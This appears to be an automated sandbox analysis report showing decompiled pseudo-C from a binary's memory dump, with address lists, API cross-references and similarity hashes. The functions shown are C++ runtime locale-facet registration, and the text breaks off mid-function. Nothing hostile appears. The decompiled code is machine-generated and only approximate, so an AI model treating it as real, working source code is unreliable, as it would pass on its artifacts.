0x6dddf00a
0x00000000
0x6dddf00a
0x6dddefd1
0x6dddefd1
0x00000000
0x6dddefd1
0x6dddefcf
0x6dddef42
0x6dddef42
0x6dddef45
0x6dddef49
0x6dddef4d
0x6dddef5a
0x6dddef62
0x6dddef64
0x00000000
0x6dddef64
0x6dddef2b
0x6dddef2b
0x00000000
0x6dddef2b
0x6dddef29

APIs

__EH_prolog3.LIBCMT ref: 6DDDEEF2
std::_Lockit::_Lockit.LIBCPMT ref: 6DDDEEFC
int.LIBCPMT ref: 6DDDEF13

Part of subcall function 6DDB161C: std::_Lockit::_Lockit.LIBCPMT ref: 6DDB162D
Part of subcall function 6DDB161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6DDB1647

codecvt.LIBCPMT ref: 6DDDEF36
std::_Facet_Register.LIBCPMT ref: 6DDDEF4D
std::_Lockit::~_Lockit.LIBCPMT ref: 6DDDEF6D
__CxxThrowException@8.LIBVCRUNTIME ref: 6DDDEF8B

Strings

0km, xrefs: 6DDDEF07

Memory Dump Source

Source File: 00000000.00000002.568139486.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000000.00000002.567135782.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.596199111.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.608518190.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.609706769.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610220654.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowcodecvt
String ID: 0km
API String ID: 2594415655-2032977153
Opcode ID: d1ef1f999e76c4a91be9f605249a0f450980ed09b56855efd16f89bf782407ec
Instruction ID: 00de44ad832d3e67fdb019f8f757dcdc7e7822f1b05845c6a3432a11bf288bc6
Opcode Fuzzy Hash: d1ef1f999e76c4a91be9f605249a0f450980ed09b56855efd16f89bf782407ec
Instruction Fuzzy Hash: 1211A0B6909519DBCF01FB64C850ABDB7B5AF54318F264009F511AB290DF749E058BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6DDDF759, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E6DDDF759(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t139;
				signed int _t140;
				void* _t152;
				void* _t165;
				void* _t178;
				void* _t191;
				void* _t204;
				void* _t217;
				void* _t230;
				void* _t243;
				signed int _t359;
				signed int _t390;
				signed int _t391;
				signed int _t392;
				signed int _t393;
				signed int _t394;
				signed int _t395;
				signed int _t396;
				signed int _t397;
				signed int _t399;
				signed int _t400;
				signed int _t401;
				signed int _t402;
				signed int _t403;
				signed int _t404;
				signed int _t405;
				signed int _t406;
				signed int _t407;
				signed int _t408;
				void* _t418;

				_t387 = __edx;
				_t296 = __ebx;
				E6DDF00AC(0x6de383cf, __ebx, __edi, __esi, 0x14);
				E6DDD6653(_t418 - 0x14, 0);
				_t399 =  *0x6de96dc4; // 0x0
				 *(_t418 - 4) =  *(_t418 - 4) & 0x00000000;
				 *(_t418 - 0x10) = _t399;
				_t139 = E6DDB161C(0x6de96d78);
				_t299 =  *((intOrPtr*)(_t418 + 8));
				_t140 = E6DDB171B( *((intOrPtr*)(_t418 + 8)), _t139);
				_t389 = _t140;
				if(_t140 != 0) {
					L5:
					E6DDD66BA(_t418 - 0x14);
					return E6DDF0075(_t389);
				} else {
					if(_t399 == 0) {
						_push( *((intOrPtr*)(_t418 + 8)));
						_push(_t418 - 0x10);
						__eflags = E6DDE12B4(__ebx, _t299, __edx, _t389, _t399) - 0xffffffff;
						if(__eflags == 0) {
							E6DDB1438(_t418 - 0x20);
							E6DDF3D74(_t418 - 0x20, 0x6de93504);
							asm("int3");
							E6DDF00AC(0x6de383cf, __ebx, _t389, _t399, 0x14);
							E6DDD6653(_t418 - 0x14, 0);
							_t400 =  *0x6de96dd8; // 0x0
							 *(_t418 - 4) =  *(_t418 - 4) & 0x00000000;
							 *(_t418 - 0x10) = _t400;
							_t152 = E6DDB161C(0x6de96d84);
							_t306 =  *((intOrPtr*)(_t418 + 8));
							_t390 = E6DDB171B( *((intOrPtr*)(_t418 + 8)), _t152);
							__eflags = _t390;
							if(_t390 != 0) {
								L12:
								E6DDD66BA(_t418 - 0x14);
								return E6DDF0075(_t390);
							} else {
								__eflags = _t400;
								if(_t400 == 0) {
									_push( *((intOrPtr*)(_t418 + 8)));
									_push(_t418 - 0x10);
									__eflags = E6DDE1339(_t296, _t306, __edx, _t390, _t400) - 0xffffffff;
									if(__eflags == 0) {
										E6DDB1438(_t418 - 0x20);
										E6DDF3D74(_t418 - 0x20, 0x6de93504);
										asm("int3");
										E6DDF00AC(0x6de383cf, _t296, _t390, _t400, 0x14);
										E6DDD6653(_t418 - 0x14, 0);
										_t401 =  *0x6de96db0; // 0x0
										 *(_t418 - 4) =  *(_t418 - 4) & 0x00000000;
										 *(_t418 - 0x10) = _t401;
										_t165 = E6DDB161C(0x6de96d64);
										_t313 =  *((intOrPtr*)(_t418 + 8));
										_t391 = E6DDB171B( *((intOrPtr*)(_t418 + 8)), _t165);
										__eflags = _t391;
										if(_t391 != 0) {
											L19:
											E6DDD66BA(_t418 - 0x14);
											return E6DDF0075(_t391);
										} else {
											__eflags = _t401;
											if(_t401 == 0) {
												_push( *((intOrPtr*)(_t418 + 8)));
												_push(_t418 - 0x10);
												__eflags = E6DDE13A1(_t296, _t313, __edx, _t391, _t401) - 0xffffffff;
												if(__eflags == 0) {
													E6DDB1438(_t418 - 0x20);
													E6DDF3D74(_t418 - 0x20, 0x6de93504);
													asm("int3");
													E6DDF00AC(0x6de383cf, _t296, _t391, _t401, 0x14);
													E6DDD6653(_t418 - 0x14, 0);
													_t402 =  *0x6de96ddc; // 0x0
													 *(_t418 - 4) =  *(_t418 - 4) & 0x00000000;
													 *(_t418 - 0x10) = _t402;
													_t178 = E6DDB161C(0x6de96d88);
													_t320 =  *((intOrPtr*)(_t418 + 8));
													_t392 = E6DDB171B( *((intOrPtr*)(_t418 + 8)), _t178);
													__eflags = _t392;
													if(_t392 != 0) {
														L26:
														E6DDD66BA(_t418 - 0x14);
														return E6DDF0075(_t392);
													} else {
														__eflags = _t402;
														if(_t402 == 0) {
															_push( *((intOrPtr*)(_t418 + 8)));
															_push(_t418 - 0x10);
															__eflags = E6DDE1409(_t296, _t320, _t387, _t392, _t402) - 0xffffffff;
															if(__eflags == 0) {
																E6DDB1438(_t418 - 0x20);
																E6DDF3D74(_t418 - 0x20, 0x6de93504);
																asm("int3");
																E6DDF00AC(0x6de383cf, _t296, _t392, _t402, 0x14);
																E6DDD6653(_t418 - 0x14, 0);
																_t403 =  *0x6de96de0; // 0x0
																 *(_t418 - 4) =  *(_t418 - 4) & 0x00000000;
																 *(_t418 - 0x10) = _t403;
																_t191 = E6DDB161C(0x6de96d8c);
																_t327 =  *((intOrPtr*)(_t418 + 8));
																_t393 = E6DDB171B( *((intOrPtr*)(_t418 + 8)), _t191);
																__eflags = _t393;
																if(_t393 != 0) {
																	L33:
																	E6DDD66BA(_t418 - 0x14);
																	return E6DDF0075(_t393);
																} else {
																	__eflags = _t403;
																	if(_t403 == 0) {
																		_push( *((intOrPtr*)(_t418 + 8)));
																		_push(_t418 - 0x10);
																		__eflags = E6DDE1471(_t296, _t327, _t387, _t393, _t403) - 0xffffffff;
																		if(__eflags == 0) {
																			E6DDB1438(_t418 - 0x20);
																			E6DDF3D74(_t418 - 0x20, 0x6de93504);
																			asm("int3");
																			E6DDF00AC(0x6de383cf, _t296, _t393, _t403, 0x14);
																			E6DDD6653(_t418 - 0x14, 0);
																			_t404 =  *0x6de96dfc; // 0x0
																			 *(_t418 - 4) =  *(_t418 - 4) & 0x00000000;
																			 *(_t418 - 0x10) = _t404;
																			_t204 = E6DDB161C(0x6de96da8);
																			_t334 =  *((intOrPtr*)(_t418 + 8));
																			_t394 = E6DDB171B( *((intOrPtr*)(_t418 + 8)), _t204);
																			__eflags = _t394;
																			if(_t394 != 0) {
																				L40:
																				E6DDD66BA(_t418 - 0x14);
																				return E6DDF0075(_t394);
																			} else {
																				__eflags = _t404;
																				if(_t404 == 0) {
																					_push( *((intOrPtr*)(_t418 + 8)));
																					_push(_t418 - 0x10);
																					__eflags = E6DDE14EC(_t296, _t334, _t387, _t394, _t404) - 0xffffffff;
																					if(__eflags == 0) {
																						E6DDB1438(_t418 - 0x20);
																						E6DDF3D74(_t418 - 0x20, 0x6de93504);
																						asm("int3");
																						E6DDF00AC(0x6de383cf, _t296, _t394, _t404, 0x14);
																						E6DDD6653(_t418 - 0x14, 0);
																						_t405 =  *0x6de96dcc; // 0x0
																						 *(_t418 - 4) =  *(_t418 - 4) & 0x00000000;
																						 *(_t418 - 0x10) = _t405;
																						_t217 = E6DDB161C(0x6de96d80);
																						_t341 =  *((intOrPtr*)(_t418 + 8));
																						_t395 = E6DDB171B( *((intOrPtr*)(_t418 + 8)), _t217);
																						__eflags = _t395;
																						if(_t395 != 0) {
																							L47:
																							E6DDD66BA(_t418 - 0x14);
																							return E6DDF0075(_t395);
																						} else {
																							__eflags = _t405;
																							if(_t405 == 0) {
																								_push( *((intOrPtr*)(_t418 + 8)));
																								_push(_t418 - 0x10);
																								__eflags = E6DDE1558(_t296, _t341, _t387, _t395, _t405) - 0xffffffff;
																								if(__eflags == 0) {
																									E6DDB1438(_t418 - 0x20);
																									E6DDF3D74(_t418 - 0x20, 0x6de93504);
																									asm("int3");
																									E6DDF00AC(0x6de383cf, _t296, _t395, _t405, 0x14);
																									E6DDD6653(_t418 - 0x14, 0);
																									_t406 =  *0x6de96e00; // 0x0
																									 *(_t418 - 4) =  *(_t418 - 4) & 0x00000000;
																									 *(_t418 - 0x10) = _t406;
																									_t230 = E6DDB161C(0x6de96dac);
																									_t348 =  *((intOrPtr*)(_t418 + 8));
																									_t396 = E6DDB171B( *((intOrPtr*)(_t418 + 8)), _t230);
																									__eflags = _t396;
																									if(_t396 != 0) {
																										L54:
																										E6DDD66BA(_t418 - 0x14);
																										return E6DDF0075(_t396);
																									} else {
																										__eflags = _t406;
																										if(_t406 == 0) {
																											_push( *((intOrPtr*)(_t418 + 8)));
																											_push(_t418 - 0x10);
																											__eflags = E6DDE15C4(_t296, _t348, _t387, _t396, _t406) - 0xffffffff;
																											if(__eflags == 0) {
																												E6DDB1438(_t418 - 0x20);
																												E6DDF3D74(_t418 - 0x20, 0x6de93504);
																												asm("int3");
																												E6DDF00AC(0x6de383cf, _t296, _t396, _t406, 0x14);
																												E6DDD6653(_t418 - 0x14, 0);
																												_t407 =  *0x6de96dd0; // 0x0
																												 *(_t418 - 4) =  *(_t418 - 4) & 0x00000000;
																												 *(_t418 - 0x10) = _t407;
																												_t243 = E6DDB161C(0x6de96d60);
																												_t355 =  *((intOrPtr*)(_t418 + 8));
																												_t397 = E6DDB171B( *((intOrPtr*)(_t418 + 8)), _t243);
																												__eflags = _t397;
																												if(_t397 != 0) {
																													L61:
																													E6DDD66BA(_t418 - 0x14);
																													return E6DDF0075(_t397);
																												} else {
																													__eflags = _t407;
																													if(_t407 == 0) {
																														_push( *((intOrPtr*)(_t418 + 8)));
																														_push(_t418 - 0x10);
																														__eflags = E6DDE162A(_t296, _t355, _t387, _t397, _t407) - 0xffffffff;
																														if(__eflags == 0) {
																															_t359 = _t418 - 0x20;
																															E6DDB1438(_t359);
																															E6DDF3D74(_t418 - 0x20, 0x6de93504);
																															asm("int3");
																															E6DDF00AC(0x6de3851f, _t296, _t397, _t407, 4);
																															_t408 = _t359;
																															 *(_t418 - 0x10) = _t408;
																															 *((intOrPtr*)(_t408 + 4)) =  *((intOrPtr*)(_t418 + 0xc));
																															_push( *((intOrPtr*)(_t418 + 0x14)));
																															_t133 = _t418 - 4;
																															 *_t133 =  *(_t418 - 4) & 0x00000000;
																															__eflags =  *_t133;
																															 *_t408 = 0x6de3c0c4;
																															 *((char*)(_t408 + 0x28)) =  *((intOrPtr*)(_t418 + 0x10));
																															E6DDE542F(_t296, _t359, _t387, _t397, _t408,  *_t133);
																															return E6DDF0075(_t408,  *((intOrPtr*)(_t418 + 8)));
																														} else {
																															_t397 =  *(_t418 - 0x10);
																															 *(_t418 - 0x10) = _t397;
																															 *(_t418 - 4) = 1;
																															E6DDD6FD3(__eflags, _t397);
																															 *0x6de3a26c();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t397 + 4))))();
																															 *0x6de96dd0 = _t397;
																															goto L61;
																														}
																													} else {
																														_t397 = _t407;
																														goto L61;
																													}
																												}
																											} else {
																												_t396 =  *(_t418 - 0x10);
																												 *(_t418 - 0x10) = _t396;
																												 *(_t418 - 4) = 1;
																												E6DDD6FD3(__eflags, _t396);
																												 *0x6de3a26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t396 + 4))))();
																												 *0x6de96e00 = _t396;
																												goto L54;
																											}
																										} else {
																											_t396 = _t406;
																											goto L54;
																										}
																									}
																								} else {
																									_t395 =  *(_t418 - 0x10);
																									 *(_t418 - 0x10) = _t395;
																									 *(_t418 - 4) = 1;
																									E6DDD6FD3(__eflags, _t395);
																									 *0x6de3a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t395 + 4))))();
																									 *0x6de96dcc = _t395;
																									goto L47;
																								}
																							} else {
																								_t395 = _t405;
																								goto L47;
																							}
																						}
																					} else {
																						_t394 =  *(_t418 - 0x10);
																						 *(_t418 - 0x10) = _t394;
																						 *(_t418 - 4) = 1;
																						E6DDD6FD3(__eflags, _t394);
																						 *0x6de3a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t394 + 4))))();
																						 *0x6de96dfc = _t394;
																						goto L40;
																					}
																				} else {
																					_t394 = _t404;
																					goto L40;
																				}
																			}
																		} else {
																			_t393 =  *(_t418 - 0x10);
																			 *(_t418 - 0x10) = _t393;
																			 *(_t418 - 4) = 1;
																			E6DDD6FD3(__eflags, _t393);
																			 *0x6de3a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t393 + 4))))();
																			 *0x6de96de0 = _t393;
																			goto L33;
																		}
																	} else {
																		_t393 = _t403;
																		goto L33;
																	}
																}
															} else {
																_t392 =  *(_t418 - 0x10);
																 *(_t418 - 0x10) = _t392;
																 *(_t418 - 4) = 1;
																E6DDD6FD3(__eflags, _t392);
																 *0x6de3a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t392 + 4))))();
																 *0x6de96ddc = _t392;
																goto L26;
															}
														} else {
															_t392 = _t402;
															goto L26;
														}
													}
												} else {
													_t391 =  *(_t418 - 0x10);
													 *(_t418 - 0x10) = _t391;
													 *(_t418 - 4) = 1;
													E6DDD6FD3(__eflags, _t391);
													 *0x6de3a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t391 + 4))))();
													 *0x6de96db0 = _t391;
													goto L19;
												}
											} else {
												_t391 = _t401;
												goto L19;
											}
										}
									} else {
										_t390 =  *(_t418 - 0x10);
										 *(_t418 - 0x10) = _t390;
										 *(_t418 - 4) = 1;
										E6DDD6FD3(__eflags, _t390);
										 *0x6de3a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t390 + 4))))();
										 *0x6de96dd8 = _t390;
										goto L12;
									}
								} else {
									_t390 = _t400;
									goto L12;
								}
							}
						} else {
							_t389 =  *(_t418 - 0x10);
							 *(_t418 - 0x10) = _t389;
							 *(_t418 - 4) = 1;
							E6DDD6FD3(__eflags, _t389);
							 *0x6de3a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t389 + 4))))();
							 *0x6de96dc4 = _t389;
							goto L5;
						}
					} else {
						_t389 = _t399;
						goto L5;
					}
				}
			}

0x6dddf759
0x6dddf759
0x6dddf760
0x6dddf76a
0x6dddf76f
0x6dddf77a
0x6dddf77e
0x6dddf781
0x6dddf786
0x6dddf78a
0x6dddf78f
0x6dddf793
0x6dddf7d8
0x6dddf7db
0x6dddf7e7
0x6dddf795
0x6dddf797
0x6dddf79d
0x6dddf7a3
0x6dddf7ab
0x6dddf7ae
0x6dddf7eb
0x6dddf7f9
0x6dddf7fe
0x6dddf806
0x6dddf810
0x6dddf815
0x6dddf820
0x6dddf824
0x6dddf827
0x6dddf82c
0x6dddf835
0x6dddf837
0x6dddf839
0x6dddf87e
0x6dddf881
0x6dddf88d
0x6dddf83b
0x6dddf83b
0x6dddf83d
0x6dddf843
0x6dddf849
0x6dddf851
0x6dddf854
0x6dddf891
0x6dddf89f
0x6dddf8a4
0x6dddf8ac
0x6dddf8b6
0x6dddf8bb
0x6dddf8c6
0x6dddf8ca
0x6dddf8cd
0x6dddf8d2
0x6dddf8db
0x6dddf8dd
0x6dddf8df
0x6dddf924
0x6dddf927
0x6dddf933
0x6dddf8e1
0x6dddf8e1
0x6dddf8e3
0x6dddf8e9
0x6dddf8ef
0x6dddf8f7
0x6dddf8fa
0x6dddf937
0x6dddf945
0x6dddf94a
0x6dddf952
0x6dddf95c
0x6dddf961
0x6dddf96c
0x6dddf970
0x6dddf973
0x6dddf978
0x6dddf981
0x6dddf983
0x6dddf985
0x6dddf9ca
0x6dddf9cd
0x6dddf9d9
0x6dddf987
0x6dddf987
0x6dddf989
0x6dddf98f
0x6dddf995
0x6dddf99d
0x6dddf9a0
0x6dddf9dd
0x6dddf9eb
0x6dddf9f0
0x6dddf9f8
0x6dddfa02
0x6dddfa07
0x6dddfa12
0x6dddfa16
0x6dddfa19
0x6dddfa1e
0x6dddfa27
0x6dddfa29
0x6dddfa2b
0x6dddfa70
0x6dddfa73
0x6dddfa7f
0x6dddfa2d
0x6dddfa2d
0x6dddfa2f
0x6dddfa35
0x6dddfa3b
0x6dddfa43
0x6dddfa46
0x6dddfa83
0x6dddfa91
0x6dddfa96
0x6dddfa9e
0x6dddfaa8
0x6dddfaad
0x6dddfab8
0x6dddfabc
0x6dddfabf
0x6dddfac4
0x6dddfacd
0x6dddfacf
0x6dddfad1
0x6dddfb16
0x6dddfb19
0x6dddfb25
0x6dddfad3
0x6dddfad3
0x6dddfad5
0x6dddfadb
0x6dddfae1
0x6dddfae9
0x6dddfaec
0x6dddfb29
0x6dddfb37
0x6dddfb3c
0x6dddfb44
0x6dddfb4e
0x6dddfb53
0x6dddfb5e
0x6dddfb62
0x6dddfb65
0x6dddfb6a
0x6dddfb73
0x6dddfb75
0x6dddfb77
0x6dddfbbc
0x6dddfbbf
0x6dddfbcb
0x6dddfb79
0x6dddfb79
0x6dddfb7b
0x6dddfb81
0x6dddfb87
0x6dddfb8f
0x6dddfb92
0x6dddfbcf
0x6dddfbdd
0x6dddfbe2
0x6dddfbea
0x6dddfbf4
0x6dddfbf9
0x6dddfc04
0x6dddfc08
0x6dddfc0b
0x6dddfc10
0x6dddfc19
0x6dddfc1b
0x6dddfc1d
0x6dddfc62
0x6dddfc65
0x6dddfc71
0x6dddfc1f
0x6dddfc1f
0x6dddfc21
0x6dddfc27
0x6dddfc2d
0x6dddfc35
0x6dddfc38
0x6dddfc75
0x6dddfc83
0x6dddfc88
0x6dddfc90
0x6dddfc9a
0x6dddfc9f
0x6dddfcaa
0x6dddfcae
0x6dddfcb1
0x6dddfcb6
0x6dddfcbf
0x6dddfcc1
0x6dddfcc3
0x6dddfd08
0x6dddfd0b
0x6dddfd17
0x6dddfcc5
0x6dddfcc5
0x6dddfcc7
0x6dddfccd
0x6dddfcd3
0x6dddfcdb
0x6dddfcde
0x6dddfd18
0x6dddfd1b
0x6dddfd29
0x6dddfd2e
0x6dddfd36
0x6dddfd3b
0x6dddfd3d
0x6dddfd43
0x6dddfd46
0x6dddfd4f
0x6dddfd4f
0x6dddfd4f
0x6dddfd53
0x6dddfd59
0x6dddfd5c
0x6dddfd68
0x6dddfce0
0x6dddfce0
0x6dddfce3
0x6dddfce7
0x6dddfceb
0x6dddfcf8
0x6dddfd00
0x6dddfd02
0x00000000
0x6dddfd02
0x6dddfcc9
0x6dddfcc9
0x00000000
0x6dddfcc9
0x6dddfcc7
0x6dddfc3a
0x6dddfc3a
0x6dddfc3d
0x6dddfc41
0x6dddfc45
0x6dddfc52
0x6dddfc5a
0x6dddfc5c
0x00000000
0x6dddfc5c
0x6dddfc23
0x6dddfc23
0x00000000
0x6dddfc23
0x6dddfc21
0x6dddfb94
0x6dddfb94
0x6dddfb97
0x6dddfb9b
0x6dddfb9f
0x6dddfbac
0x6dddfbb4
0x6dddfbb6
0x00000000
0x6dddfbb6
0x6dddfb7d
0x6dddfb7d
0x00000000
0x6dddfb7d
0x6dddfb7b
0x6dddfaee
0x6dddfaee
0x6dddfaf1
0x6dddfaf5
0x6dddfaf9
0x6dddfb06
0x6dddfb0e
0x6dddfb10
0x00000000
0x6dddfb10
0x6dddfad7
0x6dddfad7
0x00000000
0x6dddfad7
0x6dddfad5
0x6dddfa48
0x6dddfa48
0x6dddfa4b
0x6dddfa4f
0x6dddfa53
0x6dddfa60
0x6dddfa68
0x6dddfa6a
0x00000000
0x6dddfa6a
0x6dddfa31
0x6dddfa31
0x00000000
0x6dddfa31
0x6dddfa2f
0x6dddf9a2
0x6dddf9a2
0x6dddf9a5
0x6dddf9a9
0x6dddf9ad
0x6dddf9ba
0x6dddf9c2
0x6dddf9c4
0x00000000
0x6dddf9c4
0x6dddf98b
0x6dddf98b
0x00000000
0x6dddf98b
0x6dddf989
0x6dddf8fc
0x6dddf8fc
0x6dddf8ff
0x6dddf903
0x6dddf907
0x6dddf914
0x6dddf91c
0x6dddf91e
0x00000000
0x6dddf91e
0x6dddf8e5
0x6dddf8e5
0x00000000
0x6dddf8e5
0x6dddf8e3
0x6dddf856
0x6dddf856
0x6dddf859
0x6dddf85d
0x6dddf861
0x6dddf86e
0x6dddf876
0x6dddf878
0x00000000
0x6dddf878
0x6dddf83f
0x6dddf83f
0x00000000
0x6dddf83f
0x6dddf83d
0x6dddf7b0
0x6dddf7b0
0x6dddf7b3
0x6dddf7b7
0x6dddf7bb
0x6dddf7c8
0x6dddf7d0
0x6dddf7d2
0x00000000
0x6dddf7d2
0x6dddf799
0x6dddf799
0x00000000
0x6dddf799
0x6dddf797

APIs

__EH_prolog3.LIBCMT ref: 6DDDF760
std::_Lockit::_Lockit.LIBCPMT ref: 6DDDF76A
int.LIBCPMT ref: 6DDDF781

Part of subcall function 6DDB161C: std::_Lockit::_Lockit.LIBCPMT ref: 6DDB162D
Part of subcall function 6DDB161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6DDB1647

moneypunct.LIBCPMT ref: 6DDDF7A4
std::_Facet_Register.LIBCPMT ref: 6DDDF7BB
std::_Lockit::~_Lockit.LIBCPMT ref: 6DDDF7DB
__CxxThrowException@8.LIBVCRUNTIME ref: 6DDDF7F9

Strings

xmm, xrefs: 6DDDF775

Memory Dump Source

Source File: 00000000.00000002.568139486.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000000.00000002.567135782.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.596199111.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.608518190.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.609706769.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610220654.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmoneypunct
String ID: xmm
API String ID: 113178234-359119008
Opcode ID: e835051401264cb08cd920fd5d167854c39ff1856e9b86a0c8193f169a26d760
Instruction ID: 4649a11f95f179ccca7485d4ff20ee24cface9f090afb8d263b33e5ec7f1b258
Opcode Fuzzy Hash: e835051401264cb08cd920fd5d167854c39ff1856e9b86a0c8193f169a26d760
Instruction Fuzzy Hash: 3511C275909119DBCF01FBA4C844AFDB7B4AF54318F264009F521AB290DF74DA05CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6DDDF6B3, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E6DDDF6B3(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t153;
				signed int _t154;
				void* _t166;
				void* _t179;
				void* _t192;
				void* _t205;
				void* _t218;
				void* _t231;
				void* _t244;
				void* _t257;
				void* _t270;
				signed int _t397;
				signed int _t431;
				signed int _t432;
				signed int _t433;
				signed int _t434;
				signed int _t435;
				signed int _t436;
				signed int _t437;
				signed int _t438;
				signed int _t439;
				signed int _t441;
				signed int _t442;
				signed int _t443;
				signed int _t444;
				signed int _t445;
				signed int _t446;
				signed int _t447;
				signed int _t448;
				signed int _t449;
				signed int _t450;
				signed int _t451;
				void* _t462;

				_t428 = __edx;
				_t327 = __ebx;
				E6DDF00AC(0x6de383cf, __ebx, __edi, __esi, 0x14);
				E6DDD6653(_t462 - 0x14, 0);
				_t441 =  *0x6de96dc8; // 0x0
				 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
				 *(_t462 - 0x10) = _t441;
				_t153 = E6DDB161C(0x6de96d7c);
				_t330 =  *((intOrPtr*)(_t462 + 8));
				_t154 = E6DDB171B( *((intOrPtr*)(_t462 + 8)), _t153);
				_t430 = _t154;
				if(_t154 != 0) {
					L5:
					E6DDD66BA(_t462 - 0x14);
					return E6DDF0075(_t430);
				} else {
					if(_t441 == 0) {
						_push( *((intOrPtr*)(_t462 + 8)));
						_push(_t462 - 0x10);
						__eflags = E6DDE1230(__ebx, _t330, __edx, _t430, _t441) - 0xffffffff;
						if(__eflags == 0) {
							E6DDB1438(_t462 - 0x20);
							E6DDF3D74(_t462 - 0x20, 0x6de93504);
							asm("int3");
							E6DDF00AC(0x6de383cf, __ebx, _t430, _t441, 0x14);
							E6DDD6653(_t462 - 0x14, 0);
							_t442 =  *0x6de96dc4; // 0x0
							 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
							 *(_t462 - 0x10) = _t442;
							_t166 = E6DDB161C(0x6de96d78);
							_t337 =  *((intOrPtr*)(_t462 + 8));
							_t431 = E6DDB171B( *((intOrPtr*)(_t462 + 8)), _t166);
							__eflags = _t431;
							if(_t431 != 0) {
								L12:
								E6DDD66BA(_t462 - 0x14);
								return E6DDF0075(_t431);
							} else {
								__eflags = _t442;
								if(_t442 == 0) {
									_push( *((intOrPtr*)(_t462 + 8)));
									_push(_t462 - 0x10);
									__eflags = E6DDE12B4(_t327, _t337, __edx, _t431, _t442) - 0xffffffff;
									if(__eflags == 0) {
										E6DDB1438(_t462 - 0x20);
										E6DDF3D74(_t462 - 0x20, 0x6de93504);
										asm("int3");
										E6DDF00AC(0x6de383cf, _t327, _t431, _t442, 0x14);
										E6DDD6653(_t462 - 0x14, 0);
										_t443 =  *0x6de96dd8; // 0x0
										 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
										 *(_t462 - 0x10) = _t443;
										_t179 = E6DDB161C(0x6de96d84);
										_t344 =  *((intOrPtr*)(_t462 + 8));
										_t432 = E6DDB171B( *((intOrPtr*)(_t462 + 8)), _t179);
										__eflags = _t432;
										if(_t432 != 0) {
											L19:
											E6DDD66BA(_t462 - 0x14);
											return E6DDF0075(_t432);
										} else {
											__eflags = _t443;
											if(_t443 == 0) {
												_push( *((intOrPtr*)(_t462 + 8)));
												_push(_t462 - 0x10);
												__eflags = E6DDE1339(_t327, _t344, __edx, _t432, _t443) - 0xffffffff;
												if(__eflags == 0) {
													E6DDB1438(_t462 - 0x20);
													E6DDF3D74(_t462 - 0x20, 0x6de93504);
													asm("int3");
													E6DDF00AC(0x6de383cf, _t327, _t432, _t443, 0x14);
													E6DDD6653(_t462 - 0x14, 0);
													_t444 =  *0x6de96db0; // 0x0
													 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
													 *(_t462 - 0x10) = _t444;
													_t192 = E6DDB161C(0x6de96d64);
													_t351 =  *((intOrPtr*)(_t462 + 8));
													_t433 = E6DDB171B( *((intOrPtr*)(_t462 + 8)), _t192);
													__eflags = _t433;
													if(_t433 != 0) {
														L26:
														E6DDD66BA(_t462 - 0x14);
														return E6DDF0075(_t433);
													} else {
														__eflags = _t444;
														if(_t444 == 0) {
															_push( *((intOrPtr*)(_t462 + 8)));
															_push(_t462 - 0x10);
															__eflags = E6DDE13A1(_t327, _t351, _t428, _t433, _t444) - 0xffffffff;
															if(__eflags == 0) {
																E6DDB1438(_t462 - 0x20);
																E6DDF3D74(_t462 - 0x20, 0x6de93504);
																asm("int3");
																E6DDF00AC(0x6de383cf, _t327, _t433, _t444, 0x14);
																E6DDD6653(_t462 - 0x14, 0);
																_t445 =  *0x6de96ddc; // 0x0
																 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
																 *(_t462 - 0x10) = _t445;
																_t205 = E6DDB161C(0x6de96d88);
																_t358 =  *((intOrPtr*)(_t462 + 8));
																_t434 = E6DDB171B( *((intOrPtr*)(_t462 + 8)), _t205);
																__eflags = _t434;
																if(_t434 != 0) {
																	L33:
																	E6DDD66BA(_t462 - 0x14);
																	return E6DDF0075(_t434);
																} else {
																	__eflags = _t445;
																	if(_t445 == 0) {
																		_push( *((intOrPtr*)(_t462 + 8)));
																		_push(_t462 - 0x10);
																		__eflags = E6DDE1409(_t327, _t358, _t428, _t434, _t445) - 0xffffffff;
																		if(__eflags == 0) {
																			E6DDB1438(_t462 - 0x20);
																			E6DDF3D74(_t462 - 0x20, 0x6de93504);
																			asm("int3");
																			E6DDF00AC(0x6de383cf, _t327, _t434, _t445, 0x14);
																			E6DDD6653(_t462 - 0x14, 0);
